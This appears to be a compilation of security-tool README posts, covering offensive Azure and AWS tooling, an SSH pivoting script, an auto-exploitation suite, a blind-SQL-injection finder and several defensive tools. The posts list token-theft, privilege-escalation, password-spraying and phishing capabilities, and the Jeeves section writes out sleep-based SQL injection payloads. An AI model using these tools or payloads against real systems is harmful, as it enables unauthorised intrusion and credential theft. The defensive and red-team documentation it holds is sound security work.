Install-Module AzureAD -Force -Confirm -AllowClobber -Scope CurrentUser
Install-Module Microsoft.Graph -Force -Confirm -AllowClobber -Scope CurrentUser # OPTIONAL
Install-Module MSOnline -Force -Confirm -AllowClobber -Scope CurrentUser # OPTIONAL
Install-Module AzureADPreview -Force -Confirm -AllowClobber -Scope CurrentUser # OPTIONAL
Install-Module AADInternals -Force -Confirm -AllowClobber -Scope CurrentUser # OPTIONAL

Import-Module Az
Import-Module AzureAD

Even though only first two modules are required by AzureRT, its good to have others pre-installed too.

Then to load this module, simply type:

PS> . .\AzureRT.ps1

And you're good to go.

Or you can let AzureRT to install and import all the dependencies:

PS> . .\AzureRT.ps1
PS> Import-ARTModules

Batteries Included

The module will be gradually receiving next tools and utilities, naturally categorised onto subsequent kill chain phases.

Every cmdlet has a nice help message detailing parameters, description and example usage:

PS C:\> Get-Help Connect-ART

Currently, following utilities are included:

Authentication & Token mechanics

  • Get-ARTWhoami - Displays and validates our authentication context on Azure, AzureAD, Microsoft.Graph and on AZ CLI interfaces.

  • Connect-ART - Invokes Connect-AzAccount to authenticate current session to the Azure Portal via provided Access Token or credentials. Skips the burden of providing Tenant ID and Account ID by automatically extracting those from provided Token.

  • Connect-ARTAD - Invokes Connect-AzureAD (and optionally Connect-MgGraph) to authenticate current session to the Azure Active Directory via provided Access Token or credentials. Skips the burden of providing Tenant ID and Account ID by automatically extracting those from provided Token.

  • Connect-ARTADServicePrincipal - Invokes Connect-AzAccount to authenticate current session to the Azure Portal via provided Access Token or credentials. Skips the burden of providing Tenant ID and Account ID by automatically extracting those from provided Token. Then it creates self-signed PFX certificate and associates it with Service Principal for authentication. Afterwards, authenticates as that Service Principal to AzureAD and deassociates that certificate to cleanup

  • Get-ARTAccessTokenAzCli - Acquires access token from az cli, via az account get-access-token

  • Get-ARTAccessTokenAz - Acquires access token from Az module, via Get-AzAccessToken .

  • Get-ARTAccessTokenAzureAD - Gets an access token from Azure Active Directory. Authored by Simon Wahlin, @SimonWahlin

  • Get-ARTAccessTokenAzureADCached - Attempts to retrieve locally cached AzureAD access token (https://graph.microsoft.com), stored after Connect-AzureAD occurred.

  • Remove-ARTServicePrincipalKey - Performs cleanup actions after running Connect-ARTADServicePrincipal

Recon & Situational Awareness

  • Get-ARTAccess - Performs Azure Situational Awareness.

  • Get-ARTADAccess - Performs Azure AD Situational Awareness.

  • Get-ARTTenants - List Tenants available for the currently authenticated user (or the one based on supplied Access Token)

  • Get-ARTDangerousPermissions - Analyzes accessible Azure Resources and associated permissions user has on them to find all the Dangerous ones that could be abused by an attacker.

  • Get-ARTResource - Authenticates to the https://management.azure.com using provided Access Token and pulls accessible resources and permissions that token Owner have against them.

  • Get-ARTRoleAssignment - Displays a bit easier to read representation of assigned Azure RBAC roles to the currently used Principal.

  • Get-ARTADRoleAssignment - Displays Azure AD Role assignments on a current user or on all Azure AD users.

  • Get-ARTADScopedRoleAssignment - Displays Azure AD Scoped Role assignments on a current user or on all Azure AD users, associated with Administrative Units

  • Get-ARTRolePermissions - Displays all granted permissions on a specified Azure RBAC role.

  • Get-ARTADRolePermissions - Displays all granted permissions on a specified Azure AD role.

  • Get-ARTADDynamicGroups - Displays Azure AD Dynamic Groups along with their user Membership Rules, members count and current user membership status

  • Get-ARTApplication - Lists Azure AD Enterprise Applications that current user is owner of (or all existing when -All used) along with their owners and Service Principals

  • Get-ARTApplicationProxy - Lists Azure AD Enterprise Applications that have Application Proxy setup.

  • Get-ARTApplicationProxyPrincipals - Displays users and groups assigned to the specified Application Proxy application.

  • Get-ARTStorageAccountKeys - Displays all the available Storage Account keys.

  • Get-ARTKeyVaultSecrets - Lists all available Azure Key Vault secrets. This cmdlet assumes that requesting user connected to the Azure AD with KeyVaultAccessToken (scoped to https://vault.azure.net) and has "Key Vault Secrets User" role assigned (or equivalent).

  • Get-ARTAutomationCredentials - Lists all available Azure Automation Account credentials and attempts to pull their values (unable to pull values!).

  • Get-ARTAutomationRunbookCode - Invokes REST API method to pull specified Runbook's source code.

  • Get-ARTAzVMPublicIP - Retrieves Azure VM Public IP address

  • Get-ARTResourceGroupDeploymentTemplate - Displays Resource Group Deployment Template JSON based on input parameters, or pulls all of them at once.

  • Get-ARTAzVMUserDataFromInside - Retrieves Azure VM User Data from inside of a VM by reaching to Instance Metadata endpoint.

Privilege Escalation

  • Add-ARTADGuestUser - Sends Azure AD Guest user invitation e-mail, allowing to expand access to AAD tenant for the external attacker & returns Invite Redeem URL used to easily accept the invitation.

  • Set-ARTADUserPassword - Abuses Authentication Administrator Role Assignment to reset other non-admin users password.

  • Add-ARTUserToGroup - Adds a specified Azure AD User to the specified Azure AD Group.

  • Add-ARTUserToRole - Adds a specified Azure AD User to the specified Azure AD Role.

  • Add-ARTADAppSecret - Add client secret to the Azure AD Applications. Authored by Nikhil Mittal, @nikhil_mitt

Lateral Movement

  • Invoke-ARTAutomationRunbook - Creates an Automation Runbook under specified Automation Account and against selected Worker Group. That Runbook will contain Powershell commands to be executed on all the affected Azure VMs.

  • Invoke-ARTRunCommand - Abuses virtualMachines/runCommand permission against a specified Azure VM to run custom Powershell command.

  • Update-ARTAzVMUserData - Modifies Azure VM User Data script through a direct API invocation.

  • Invoke-ARTCustomScriptExtension - Creates new or modifies Azure VM Custom Script Extension leading to remote code execution.

Misc

  • Get-ARTTenantID - Retrieves Current user's Tenant ID or Tenant ID based on Domain name supplied.

  • Get-ARTPRTToken - Retrieves Current user's PRT (Primary Refresh Token) value using Dirk-Jan Mollema's ROADtoken

  • Get-ARTPRTNonce - Retrieves Current user's PRT (Primary Refresh Token) nonce value

  • Get-ARTUserId - Acquires current user or user specified in parameter ObjectId via Az module

  • Get-ARTSubscriptionId - Helper that collects current Subscription ID.

  • Parse-JWTtokenRT - Parses input JWT token and prints it out nicely.

  • Invoke-ARTGETRequest - Takes Access Token and invokes GET REST method API request against a specified URI. It also verifies whether provided token has required audience set.

  • Import-ARTModules - Installs & Imports required & optional Powershell modules for Azure Red Team activities


Show Support

This and other projects are outcome of sleepless nights and plenty of hard work. If you like what I do and appreciate that I always give back to the community, Consider buying me a coffee (or better a beer) just to say thank you!

ο’ͺ

Mariusz Banach / mgeeky, (@mariuszbit)
<mb [at] binary-offensive.com>


Puwr - SSH Pivoting Script For Expanding Attack Surfaces On Local Networks


Easily expand your attack surface on a local network by discovering more hosts, via SSH.

Using a machine running a SSH service, Puwr uses a given subnet range to scope out IP's, sending back any successful ping requests it has. This can be used to expand out an attack surface on a local network, by forwarding you hosts you couldn't normally reach from your own device.

(example below of how Puwr handles requests)Β 

Usage

Puwr is simple to run, only requiring 4 flags:
python3 puwr.py (MACHINE IP) (USER) (PASSWORD) (SUBNET VALUE)

example:
python3 puwr.py 10.0.0.53 xeonrx password123 10.0.0.1/24

If you need to connect through a port other than 22, use the -p flag. (example: -p 2222)
If you want to keep quiet, use the -s flag to wait specified seconds between request. (example: -s 5)
Use the -h flag for usage reference in the script.

The paramiko and netaddr modules are required for this script to work!
You can install them with the pip tool:
pip install netaddr paramiko

Disclaimer

Note this script is purley just a small enumeration script, and does not directly attack any found devices on the network. Wether you decide to remain persistence on the machine and use it to attack other devices from it, is your choice.

I encourage you carry out these techniques with permission, and stay in the legal bound of things. Cyber attacks are highly illegal, and no one but you is responsible for any crime.

License

Puwr uses the MIT License. You can read about it here:

MIT License

Copyright (c) 2022 ciiphys

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABIL ITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


AWS-Threat-Simulation-and-Detection - Playing Around With Stratus Red Team (Cloud Attack Simulation Tool) And SumoLogic


This repository is a documentation of my adventures with Stratus Red Team - a tool for adversary emulation for the cloud.

Stratus Red Team is "Atomic Red Team for the cloud, allowing to emulate offensive attack techniques in a granular and self-contained manner.


We run the attacks covered in the Stratus Red Team repository one by one on our AWS account. In order to monitor them, we will use CloudTrail and CloudWatch for logging and ingest these logs into SumoLogic for further analysis.

Attack Description Link
aws.credential-access.ec2-get-password-data Retrieve EC2 Password Data Link
aws.credential-access.ec2-steal-instance-credentials Steal EC2 Instance Credentials Link
aws.credential-access.secretsmanager-retrieve-secrets Retrieve a High Number of Secrets Manager secrets Link
aws.credential-access.ssm-retrieve-securestring-parameters Retrieve And Decrypt SSM Parameters Link
aws.defense-evasion.cloudtrail-delete Delete CloudTrail Trail Link
aws.defense-evasion.cloudtrail-event-selectors Disable CloudTrail Logging Through Event Selectors Link
aws.defense-evasion.cloudtrail-lifecycle-rule CloudTrail Logs Impairment Through S3 Lifecycle Rule Link
aws.defense-evasion.cloudtrail-stop Stop CloudTrail Trail Link
aws.defense-evasion.organizations-leave Attempt to Leave the AWS Organization Link
aws.defense-evasion.vpc-remove-flow-logs Remove VPC Flow Logs Link
aws.discovery.ec2-enumerate-from-instance Execute Discovery Commands on an EC2 Instance Link
aws.discovery.ec2-download-user-data Download EC2 Instance User Data TBD
aws.exfiltration.ec2-security-group-open-port-22-ingress Open Ingress Port 22 on a Security Group Link
aws.exfiltration.ec2-share-ami Exfiltrate an AMI by Sharing It Link
aws.exfiltration.ec2-share-ebs-snapshot Exfiltrate EBS Snapshot by Sharing It Link
aws.exfiltration.rds-share-snapshot Exfiltrate RDS Snapshot by Sharing Link
aws.exfiltration.s3-backdoor-bucket-policy Backdoor an S3 Bucket via its Bucket Policy Link
aws.persistence.iam-backdoor-role Backdoor an IAM Role Link
aws.persistence.iam-backdoor-user Create an Access Key on an IAM User TBD
aws.persistence.iam-create-admin-user Create an administrative IAM User TBD
aws.persistence.iam-create-user-login-profile Create a Login Profile on an IAM User TBD
aws.persistence.lambda-backdoor-function Backdoor Lambda Function Through Resource-Based Policy TBD

Credits

  1. Awesome team at Datadog, Inc. for Stratus Red Team here
  2. Hacking the Cloud AWS
  3. Falcon Force team blog


Lockc - Making Containers More Secure With eBPF And Linux Security Modules (LSM)


lockc is open source sofware for providing MAC (Mandatory Access Control) type of security audit for container workloads.

The main reason why lockc exists is that containers do not contain. Containers are not as secure and isolated as VMs. By default, they expose a lot of information about host OS and provide ways to "break out" from the container. lockc aims to provide more isolation to containers and make them more secure.

The Containers do not contain documentation section explains what we mean by that phrase and what kind of behavior we want to restrict with lockc.

The main technology behind lockc is eBPF - to be more precise, its ability to attach to LSM hooks

Please note that currently lockc is an experimental project, not meant for production environment and without any official binaries or packages to use - currently the only way to use it is building from sources.

See the full documentation here. And the code documentation here.

If you need help or want to talk with contributors, plese come chat with us on #lockc channel on the Rust Cloud Native Discord server.

lockc's userspace part is licensed under Apache License, version 2.0.

eBPF programs inside lockc/src/bpf directory are licensed under GNU General Public License, version 2.



Sentinel-Attack - Tools To Rapidly Deploy A Threat Hunting Capability On Azure Sentinel That Leverages Sysmon And MITRE ATT&CK


Sentinel ATT&CK aims to simplify the rapid deployment of a threat hunting capability that leverages Sysmon and MITRE ATT&CK on Azure Sentinel.

DISCLAIMER: This tool requires tuning and investigative trialling to be truly effective in a production environment.


Overview

Sentinel ATT&CK provides the following tools:

Usage

Head over to the WIKI to learn how to deploy and run Sentinel ATT&CK.

A copy of the DEF CON 27 cloud village presentation introducing Sentinel ATT&CK can be found here and here.

Contributing

As this repository is constantly being updated and worked on, if you spot any problems we warmly welcome pull requests or submissions on the issue tracker.

Authors and contributors

Sentinel ATT&CK is built with <3 by:

  • Edoardo Gerosa

Special thanks go to the following contributors:



Nipe - An Engine To Make Tor Network Your Default Gateway


The Tor project allows users to surf the Internet, chat and send instant messages anonymously through its own mechanism. It is used by a wide variety of people, companies and organizations, both for lawful activities and for other illicit purposes. Tor has been largely used by intelligence agencies, hacking groups, criminal activities and even ordinary users who care about their privacy in the digital world.

Nipe is an engine, developed in Perl, that aims on making the Tor network your default network gateway. Nipe can route the traffic from your machine to the Internet through Tor network, so you can surf the Internet having a more formidable stance on privacy and anonymity in cyberspace.

Currently, only IPv4 is supported by Nipe, but we are working on a solution that adds IPv6 support. Also, only traffic other than DNS requests destined for local and/or loopback addresses is not trafficked through Tor. All non-local UDP/ICMP traffic is also blocked by the Tor project.


Download and install

  # Download
$ git clone https://github.com/htrgouvea/nipe && cd nipe

# Install libs and dependencies
$ sudo cpan install Try::Tiny Config::Simple JSON

# Nipe must be run as root
$ perl nipe.pl install

Commands:

  COMMAND          FUNCTION
install Install dependencies
start Start routing
stop Stop routing
restart Restart the Nipe circuit
status See status

Examples:

perl nipe.pl install
perl nipe.pl start
perl nipe.pl stop
perl nipe.pl restart
perl nipe.pl status

Demo


Contribution


License



Socialhunter - Crawls The Website And Finds Broken Social Media Links That Can Be Hijacked


Crawls the given URL and finds broken social media links that can be hijacked. Broken social links may allow an attacker to conduct phishing attacks. It also can cost a loss of the company's reputation. Broken social media hijack issues are usually accepted on the bug bounty programs.


Currently, it supports Twitter, Facebook, Instagram and Tiktok without any API keys.

crawls the website and finds broken social media links that can be hijacked (1)

Installation

From Binary

You can download the pre-built binaries from the releases page and run. For example:

wget https://github.com/utkusen/socialhunter/releases/download/v0.1.1/socialhunter_0.1.1_Linux_amd64.tar.gz

tar xzvf socialhunter_0.1.1_Linux_amd64.tar.gz

./socialhunter --help

From Source

  1. Install Go on your system
  2. Run: go get -u github.com/utkusen/socialhunter

Usage

socialhunter requires 2 parameters to run:

-f : Path of the text file that contains URLs line by line. The crawl function is path-aware. For example, if the URL is https://utkusen.com/blog, it only crawls the pages under /blog path

-w : The number of workers to run (e.g -w 10). The default value is 5. You can increase or decrease this by testing out the capability of your system.



AutoPWN Suite - Project For Scanning Vulnerabilities And Exploiting Systems Automatically


AutoPWN Suite is a project for scanning vulnerabilities and exploiting systems automatically.

How does it work?

AutoPWN Suite uses nmap TCP-SYN scan to enumerate the host and detect the version of softwares running on it. After gathering enough information about the host, AutoPWN Suite automatically generates a list of "keywords" to search NIST vulnerability database.

Visit "PWN Spot!" for more information


Demo

AutoPWN Suite has a very user friendly easy to read output.

AutoPWN Suite is a project for scanning vulnerabilities and exploiting systems automatically. (10)

Installation

You can install it using pip. (sudo recommended)

sudo pip install autopwn-suite

OR

You can clone the repo.

git clone https://github.com/GamehunterKaan/AutoPWN-Suite.git

OR

You can download debian (deb) package from releases.

sudo apt-get install ./autopwn-suite_1.1.5.deb

Usage

Running with root privileges (sudo) is always recommended.

Automatic mode (This is the intended way of using AutoPWN Suite.)

autopwn-suite -y

Help Menu

vulnerability detection for faster scanning. (Default : None) -y, --yesplease Don't ask for anything. (Full automatic mode) -m {evade,noise,normal}, --mode {evade,noise,normal} Scan mode. -nt TIMEOUT, --noisetimeout TIMEOUT Noise mode timeout. (Default : None) -c CONFIG, --config CONFIG Specify a config file to use. (Default : None) -v, --version Print version and exit.">
$ autopwn-suite -h
usage: autopwn.py [-h] [-o OUTPUT] [-t TARGET] [-hf HOSTFILE] [-st {arp,ping}] [-nf NMAPFLAGS] [-s {0,1,2,3,4,5}] [-a API] [-y] [-m {evade,noise,normal}] [-nt TIMEOUT] [-c CONFIG] [-v]

AutoPWN Suite

options:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
Output file name. (Default : autopwn.log)
-t TARGET, --target TARGET
Target range to scan. This argument overwrites the hostfile argument. (192.168.0.1 or 192.168.0.0/24)
-hf HOSTFILE, --hostfile HOSTFILE
File containing a list of hosts to scan.
-st {arp,ping}, --scantype {arp,ping}
Scan type.
-nf NMAPFLAGS, --nmapflags NMAPFLAGS
Custom nmap flags to use for portscan. (Has to be specified like : -nf="-O")
-s {0,1,2,3,4, 5}, --speed {0,1,2,3,4,5}
Scan speed. (Default : 3)
-a API, --api API Specify API key for vulnerability detection for faster scanning. (Default : None)
-y, --yesplease Don't ask for anything. (Full automatic mode)
-m {evade,noise,normal}, --mode {evade,noise,normal}
Scan mode.
-nt TIMEOUT, --noisetimeout TIMEOUT
Noise mode timeout. (Default : None)
-c CONFIG, --config CONFIG
Specify a config file to use. (Default : None)
-v, --version Print version and exit.

TODO

  • Vulnerability detection based on version.
  • Easy to read output.
  • Function to output results to a file.
  • pypi package for easily installing with just pip install autopwn-suite.
  • Automatically install nmap if its not installed.
  • Noise mode. (Does nothing but creating a lot of noise)
  • .deb package for Debian based systems like Kali Linux and Parrot Security.
  • Argument for passing custom nmap flags.
  • Config file argument to specify configurations in a seperate config file.
  • Function to automatically download exploit related to vulnerability.
  • Arch Linux package for Arch based systems like BlackArch and ArchAttack.
  • Seperate script for checking local privilege escalation vulnerabilities.
  • Windows and OSX support.
  • Functionality to brute force common services like ssh, vnc, ftp etc.
  • Built in reverse shell handler that automatically stabilizes shell like pwncat.
  • Function to generate reverse shell commands based on IP and port.
  • GUI interface.
  • Meterpreter payload generator with common evasion techniques.
  • Fileless malware unique to AutoPWN Suite.
  • Daemon mode.
  • Option to email the results automatically.
  • Web application analysis.
  • Web application content discovery mode. (dirbusting)
  • Option to use as a module.

Contributing to AutoPWN Suite

I would be glad if you are willing to contribute this project. I am looking forward to merge your pull request unless its something that is not needed or just a personal preference. Click here for more info!

Legal

You may not rent or lease, distribute, modify, sell or transfer the software to a third party. AutoPWN Suite is free for distribution, and modification with the condition that credit is provided to the creator and not used for commercial use. You may not use software for illegal or nefarious purposes. No liability for consequential damages to the maximum extent permitted by all applicable laws.

Support or Contact

Having trouble using this tool? You can reach me out on discord, create an issue or create a discussion!



Offensive-Azure - Collection Of Offensive Tools Targeting Microsoft Azure


Collection of offensive tools targeting Microsoft Azure written in Python to be platform agnostic. The current list of tools can be found below with a brief description of their functionality.

  • ./Device_Code/device_code_easy_mode.py
    • Generates a code to be entered by the target user
    • Can be used for general token generation or during a phishing/social engineering campaign.
  • ./Access_Tokens/token_juggle.py
    • Takes in a refresh token in various ways and retrieves a new refresh token and an access token for the resource specified
  • ./Access_Tokens/read_token.py
    • Takes in an access token and parses the included claims information, checks for expiration, attempts to validate signature
  • ./Outsider_Recon/outsider_recon.py
    • Takes in a domain and enumerates as much information as possible about the tenant without requiring authentication
  • ./User_Enum/user_enum.py
    • Takes in a username or list of usernames and attempts to enumerate valid accounts using one of three methods
    • Can also be used to perform a password spray
  • ./Azure_AD/get_tenant.py
    • Takes in an access token or refresh token, outputs tenant ID and tenant Name
    • Creates text output file as well as BloodHound compatible aztenant file
  • ./Azure_AD/get_users.py
    • Takes in an access token or refresh token, outputs all users in Azure AD and all available user properties in Microsoft Graph
    • Creates three data files, a condensed json file, a raw json file, and a BloodHound compatible azusers file
  • ./Azure_AD/get_groups.py
    • Takes in an access token or refresh token, outputs all groups in Azure AD and all available group properties in Microsoft Graph
    • Creates three data files, a condensed json file, a raw json file, and a BloodHound compatible azgroups file
  • ./Azure_AD/get_group_members.py
    • Takes in an access token or refresh token, outputs all group memberships in Azure AD and all available group member properties in Microsoft Graph
    • Creates three data files, a condensed json file, a raw json file, and a BloodHound compatible azgroups file
  • ./Azure_AD/get_subscriptions.py
    • Takes in an ARM token or refresh token, outputs all subscriptions in Azure and all available subscription properties in Azure Resource Manager
    • Creates three data files, a condensed json file, a raw json file, and a BloodHound compatible azgroups file
  • ./Azure_AD/get_resource_groups.py
    • Takes in an ARM token or refresh token, outputs all resource groups in Azure and all available resource group properties in Azure Resource Manager
    • Creates two data files, a raw json file, and a BloodHound compatible azgroups file
  • ./Azure_AD/get_vms.py
    • Takes in an ARM token or refresh token, outputs all virtual machines in Azure and all available VM properties in Azure Resource Manager
    • Creates two data files, a raw json file, and a BloodHound compatible azgroups file

Installation

Offensive Azure can be installed in a number of ways or not at all.

You are welcome to clone the repository and execute the specific scripts you want. A requirements.txt file is included for each module to make this as easy as possible.

Poetry

The project is built to work with poetry. To use, follow the next few steps:

git clone https://github.com/blacklanternsecurity/offensive-azure.git
cd ./offensive-azure
poetry install

Pip

The packaged version of the repo is also kept on pypi so you can use pip to install as well. We recommend you use pipenv to keep your environment as clean as possible.

pipenv shell
pip install offensive_azure

Usage

It is up to you for how you wish to use this toolkit. Each module can be ran independently, or you can install it as a package and use it in that way. Each module is exported to a script named the same as the module file. For example:

Poetry

poetry install
poetry run outsider_recon your-domain.com

Pip

pipenv shell
pip install offensive_azure
outsider_recon your-domain.com


Blackbird - An OSINT Tool To Search For Accounts By Username In 101 Social Networks

Blackbird

An OSINT tool to search fast for accounts by username across 101 sites.

The Lockheed SR-71 "Blackbird" is a long-range, high-altitude, Mach 3+ strategic reconnaissance aircraft developed and manufactured by the American aerospace company Lockheed Corporation.

Disclaimer

This or previous program is for Educational purpose ONLY. Do not use it without permission. 
The usual disclaimer applies, especially the fact that me (P1ngul1n0) is not liable for any
damages caused by direct or indirect use of the information or functionality provided by these
programs. The author or any Internet provider bears NO responsibility for content or misuse
of these programs or any derivatives thereof. By using these programs you accept the fact
that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these
programs is not P1ngul1n0's responsibility.

Setup

Clone the repository

git clone https://github.com/p1ngul1n0/blackbird
cd blackbird

Install requirements

pip install -r requirements.txt

Usage

Search by username

python blackbird.py -u username

Run WebServer

python blackbird.py --web

Access http://127.0.0.1:5000 on the browser

Read results file

python blackbird.py -f username.json

List supportted sites

python blackbird.py --list-sites

Supported Social Networks

  1. Facebook
  2. YouTube
  3. Twitter
  4. Telegram
  5. TikTok
  6. Tinder
  7. Instagram
  8. Pinterest
  9. Snapchat
  10. Reddit
  11. Soundcloud
  12. Github
  13. Steam
  14. Linktree
  15. Xbox Gamertag
  16. Twitter Archived
  17. Xvideos
  18. PornHub
  19. Xhamster
  20. Periscope
  21. Ask FM
  22. Vimeo
  23. Twitch
  24. Pastebin
  25. WordPress Profile
  26. WordPress Site
  27. AllMyLinks
  28. Buzzfeed
  29. JsFiddle
  30. Sourceforge
  31. Kickstarter
  32. Smule
  33. Blogspot
  34. Tradingview
  35. Internet Archive
  36. Alura
  37. Behance
  38. MySpace
  39. Disqus
  40. Slideshare
  41. Rumble
  42. Ebay
  43. RedBubble
  44. Kik
  45. Roblox
  46. Armor Games
  47. Fortnite Tracker
  48. Duolingo
  49. Chess
  50. Shopify
  51. Untappd
  52. Last FM
  53. Cash APP
  54. Imgur
  55. Trello
  56. MCUUID Minecraft
  57. Patreon
  58. DockerHub
  59. Kongregate
  60. Vine
  61. Gamespot
  62. Shutterstock
  63. Chaturbate
  64. ProtonMail
  65. TripAdvisor
  66. RapidAPI
  67. HackTheBox
  68. Wikipedia
  69. Buymeacoffe
  70. Arduino
  71. League of Legends Tracker
  72. Lego Ideas
  73. Fiverr
  74. Redtube
  75. Dribble
  76. Packet Storm Security
  77. Ello
  78. Medium
  79. Hackaday
  80. Keybase
  81. HackerOne
  82. BugCrowd
  83. DevPost
  84. OneCompiler
  85. TryHackMe
  86. Lyrics Training
  87. Expo
  88. RAWG
  89. Coroflot
  90. Cloudflare
  91. Wattpad
  92. Mixlr
  93. ImageShack
  94. Freelancer
  95. Dev To
  96. BitBucket
  97. Ko Fi
  98. Flickr
  99. HackerEarth
  100. Spotify
  101. Snapchat Stories

Supersonic speed

Blackbird sends async HTTP requests, allowing a lot more speed when discovering user accounts.

JSON Template

Blackbird uses JSON as a template to store and read data.

The data.json file store all sites that blackbird verify.

Params

  • app - Site name
  • url
  • valid - Python expression that returns True when user exists
  • id - Unique numeric ID
  • method - HTTP method
  • json - JSON body POST (needs to be escaped, use this
    https://codebeautify.org/json-escape-unescape)
  • {username} - Username place (URL or Body)
  • response.status - HTTP response status
  • responseContent - Raw response body
  • soup - Beautifulsoup parsed response body
  • jsonData - JSON response body

Examples

GET

    {
"app": "ExampleAPP1",
"url": "https://www.example.com/{username}",
"valid": "response.status == 200",
"id": 1,
"method": "GET"
}

POST JSON

    {
"app": "ExampleAPP2",
"url": "https://www.example.com/user",
"valid": "jsonData['message']['found'] == True",
"json": "{{\"type\": \"username\",\"input\": \"{username}\"}}",
"id": 2,
"method": "POST"
}

If you have any suggestion of a site to be included in the search, make a pull request following the template.

Contact

Feel free to contact me on Twitter



PacketStreamer - Distributed Tcpdump For Cloud Native Environments


Deepfence PacketStreamer is a high-performance remote packet capture and collection tool. It is used by Deepfence's ThreatStryker security observability platform to gather network traffic on demand from cloud workloads for forensic analysis.

Primary design goals:

  • Stay light, capture and stream, no additional processing
  • Portability, works across virtual machines, Kubernetes and AWS Fargate. Linux and Windows

PacketStreamer sensors are started on the target servers. Sensors capture traffic, apply filters, and then stream the traffic to a central reciever. Traffic streams may be compressed and/or encrypted using TLS.

The PacketStreamer receiver accepts PacketStreamer streams from multiple remote sensors, and writes the packets to a local pcap capture file

PacketStreamer sensors collect raw network packets on remote hosts. It selects packets to capture using a BPF filter, and forwards them to a central reciever process where they are written in pcap format. Sensors are very lightweight and impose little performance impact on the remote hosts. PacketStreamer sensors can be run on bare-metal servers, on Docker hosts, and on Kubernetes nodes.

The PacketStreamer receiver accepts network traffic from multiple sensors, collecting it into a single, central pcap file. You can then process the pcap file or live feed the traffic to the tooling of your choice, such as Zeek, Wireshark Suricata, or as a live stream for Machine Learning models.

When to use PacketStreamer

PacketStreamer meets more general use cases than existing alternatives. For example, PacketBeat captures and parses the packets on multiple remote hosts, assembles transactions, and ships the processed data to a central ElasticSearch collector. ksniff captures raw packet data from a single Kubernetes pod.

Use PacketStreamer if you need a lightweight, efficient method to collect raw network data from multiple machines for central logging and analysis.

Quick Start

For full instructions, refer to the PacketStreamer Documentation.

You will need to install the golang toolchain and libpcap-dev before building PacketStreamer.

# Pre-requisites (Ubuntu): sudo apt install golang-go libpcap-dev
git clone https://github.com/deepfence/PacketStreamer.git
cd PacketStreamer/
make

Run a PacketStreamer receiver, listening on port 8081 and writing pcap output to /tmp/dump_file (see receiver.yaml):

./packetstreamer receiver --config ./contrib/config/receiver.yaml

Run one or more PacketStreamer sensors on local and remote hosts. Edit the server address in sensor.yaml:

# run on the target hosts to capture and forward traffic

# copy and edit the sample sensor-local.yaml file, and add the address of the receiver host
cp ./contrib/config/sensor-local.yaml ./contrib/config/sensor.yaml

./packetstreamer sensor --config ./contrib/config/sensor.yaml

Who uses PacketStreamer?

Get in touch

Thank you for using PacketStreamer.

  • Start with the documentation
  • Got a question, need some help? Find the Deepfence team on Slack
  • Got a feature request or found a bug? Raise an issue
  • productsecurity at deepfence dot io: Found a security issue? Share it in confidence
  • Find out more at deepfence.io

Security and Support

For any security-related issues in the PacketStreamer project, contact productsecurity at deepfence dot io.

Please file GitHub issues as needed, and join the Deepfence Community Slack channel.

License

The Deepfence PacketStreamer project (this repository) is offered under the Apache2 license.

Contributions to Deepfence PacketStreamer project are similarly accepted under the Apache2 license, as per GitHub's inbound=outbound policy.



Jeeves - Time-Based Blind SQLInjection Finder


Jeeves is made for looking to Time-Based Blind SQLInjection through recon.


- Installation & Requirements:

Installing Jeeves

ο’€
$ go install github.com/ferreiraklet/Jeeves@latest

OR

$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h

- Usage & Explanation:

In Your recon process, you may find endpoints that can be vulnerable to sql injection, Ex: https://redacted.com/index.php?id=1

Single urls

echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10

In --payload-time you must use the time mentioned in payload


From list

cat targets | jeeves --payload-time 5

Adding Headers

Pay attention to the syntax! Must be the same =>

echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"

Using proxy

echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"

Proxy + Headers =>

echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"

Post Request

Sending data through post request ( login forms, etc )

Pay attention to the syntax! Must be equal! ->

echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"
echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"

Another ways of Usage

You are able to use of Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strenght


Command line flags:

traffic to a proxy -c Set Concurrency, Default 25 -H, --headers Custom Headers -d, --data Sending Post request with data -h Show This Help Message">
 Usage:
-t, --payload-time, The time from payload
-p, --proxy Send traffic to a proxy
-c Set Concurrency, Default 25
-H, --headers Custom Headers
-d, --data Sending Post request with data
-h Show This Help Message

